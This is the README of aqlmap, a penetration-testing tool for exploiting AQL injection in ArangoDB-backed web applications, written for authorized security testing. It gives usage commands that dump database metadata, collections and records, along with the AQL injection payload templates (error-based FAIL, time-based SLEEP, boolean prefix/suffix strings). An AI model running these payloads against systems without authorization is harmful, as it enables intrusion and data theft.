aqlmap

A command-line tool to extract information from ArangoDB through AQL (ArangoDB Query Language) injection vulnerabilities.

For more information, see Anvil's blog post Exploiting AQL Injection Vulnerabilities in ArangoDB.

Overview

aqlmap is a specialized tool designed for security researchers and penetration testers to exploit AQL injection flaws in web applications using ArangoDB as their database backend. The tool supports multiple extraction techniques and provides several options for fine-tuned exploitation.

Features

• Multiple Extraction Techniques:

  • Error-based: Exploits verbose error messages to extract data
  • Reflected: Extracts data from successful responses (union-based style)
  • Blind: Boolean-based extraction using response pattern matching
  • Time-based: Measures response delays to extract information

• Database Enumeration:

  • Extract database metadata (name, user, version)
  • List all collections
  • Count items in collections
  • Dump collection contents

• Flexible Payload Injection:

  • Custom prefixes and suffixes for injection
  • Multiple encoding formats (JSON, URL-encoded, HTML-encoded, plaintext)
  • Support for HTTP proxies
  • Option to disable SSL/TLS certificate verification

Installation

Prerequisites

• Python 3.7 or higher
• pip (Python package manager)

From Source

git clone https://github.com/anvilsecure/aqlmap.git
cd aqlmap
pip install -e .

This installs aqlmap as a command-line tool that you can run from anywhere.

Quick Start

1. Create a Request File

Create a file containing the HTTP request you want to test (e.g., request.txt):

GET /api/search?q=test HTTP/1.1
Host: target.example.com
User-Agent: Mozilla/5.0
Accept: application/json

2. Run aqlmap

# Extract database metadata using error-based technique (default)
aqlmap -r request.txt -p q --db-info

# List all collections
aqlmap -r request.txt -p q --collections

# Dump collection contents
aqlmap -r request.txt -p q --collection users --dump

Usage Guide

Core Parameters

Required Arguments

-r, --request FILE          HTTP request file (required)
-p, --param PARAM_NAME      Parameter name to inject (required)

Database Operations

--db-info                   Extract database metadata (name, user, version)
--collections               List all collection names in the database
--count                     Count items in a collection (requires --collection)
--dump                      Dump items from a collection (requires --collection)
-c, --collection NAME       Collection name (used with --count and --dump)
--start INT                 Start position for dumping items (0-based)
--stop INT                  Stop position for dumping items (inclusive)

Extraction Techniques

--technique {error|reflected|blind|time}
                            Extraction technique to use (default: error)

Technique Details:

• error (Default): Uses AQL FAIL() function with markers to extract data from error messages

  aqlmap -r request.txt -p q --db-info --technique error

• reflected: Extracts data from successful responses without error messages

  aqlmap -r request.txt -p q --db-info --technique reflected

• blind: Boolean-based extraction requiring response pattern matching

  aqlmap -r request.txt -p q --db-info --technique blind \
    --string "SUCCESS" --not-string "FAILED"

  Parameters:

  • --string TEXT: String to match when query evaluates to True
  • --not-string TEXT: String to match when query evaluates to False

• time: Measures response delays to extract information

  aqlmap -r request.txt -p q --db-info --technique time --delay 2.0

  Parameters:

  • --delay SECONDS: Delay in seconds for time-based extraction (default: 1.0, supports decimals like 0.5)

Injection Control

--prefix STRING             String to prepend before the AQL payload (e.g., "\" or ')
--suffix STRING             String to append after the AQL payload (e.g., ' or ""')
--input-encoding {json|urlencoded|plaintext}
                            Encoding format for payloads (default: json)
--output-encoding {json|plaintext|html}
                            Encoding format for responses (default: json)

Network Options

-u, --url BASE_URL          Base URL to use (overrides host from request file)
--proxy PROXY_URL           HTTP/HTTPS proxy (e.g., http://127.0.0.1:8080)
--no-verify-ssl             Disable SSL/TLS certificate verification

Other Options

-v, --verbose               Enable verbose output

Examples

Refer to the examples directory to run a self-hosted vulnerable application and exploit it.

In addition, below are some examples of how to use the tool with different arguments.

Example 1: Extract Database Metadata

aqlmap -r request.txt -p search_query --db-info

Output:

[*] Validating output encoding with canary test...
[+] Encoding validation passed
[*] Extracting database metadata...

[+] Database Metadata:
    Database: aql-injectable-db
    Username: root
    Version: 3.12.5

Example 2: List All Collections

aqlmap -r request.txt -p id --collections

Output:

[*] Validating output encoding with canary test...
[+] Encoding validation passed
[*] Extracting collection names...

[+] Collections (10):
    - _analyzers
    - _appbundles
    - _apps
    - _aqlfunctions
    - _frontend
    - _graphs
    - _jobs
    - _queues
    - external_users
    - internal_users

Example 3: Dump Collection Data

aqlmap -r request.txt -p product_id --collection products --dump --start 0 --stop 5

Example 4: Use Reflected Extraction

aqlmap -r request.txt -p q --db-info --technique reflected

Example 5: Use Time-Based Blind Extraction

aqlmap -r request.txt -p id --collections --technique time --delay 1.5 -v

Example 6: Use Boolean-Based Blind Extraction

aqlmap -r request.txt -p username --db-info --technique blind --string "Valid user" --not-string "Invalid user"

Example 7: Custom Injection with Prefix/Suffix

If the injection point requires additional payloads, use prefix and suffix:

aqlmap -r request.txt -p query --db-info --prefix "' OR " --suffix " AND '2'=='1"

Example 8: With HTTP Proxy and Verbose Output

aqlmap -r request.txt -p q --collections -v --proxy http://127.0.0.1:8080

Request File Format

The request file should contain a valid HTTP request. Example:

GET /api/search?q=test HTTP/1.1
Host: target.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: application/json
Connection: close

For requests with a body (e.g., POST, PUT, etc):

POST /api/query HTTP/1.1
Host: target.example.com
Content-Type: application/json
Content-Length: 23

{"search":"test value"}

Supported ArangoDB Versions

• Tested with ArangoDB 3.12.5 and 3.12.7-2.
• Most of the newer and older versions should also be supported.

How It Works

Error-Based Extraction

Uses the FAIL() function to force error messages:

FAIL(CONCAT("aqlmap-begin", CURRENT_DATABASE(), "aqlmap-end"))

The tool extracts data from the error response between the markers.

Reflected Extraction

Combines payloads directly in the response without errors:

CONCAT("aqlmap-begin", CURRENT_DATABASE(), "aqlmap-end")

Blind Extraction

Uses boolean logic with response pattern matching:

IF(condition, string_that_appears_in_true_response, string_in_false_response)

Time-Based Extraction

Uses conditional sleep injection:

(condition ? FAIL(SLEEP(1.5)) : 0)

The tool measures response time to determine if the condition is true.

Disclaimer

This tool is provided for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing for vulnerabilities.

License

GPL-3.0-or-later

Contributing

Contributions are welcome! Please feel free to submit pull requests or open issues for bugs and feature requests.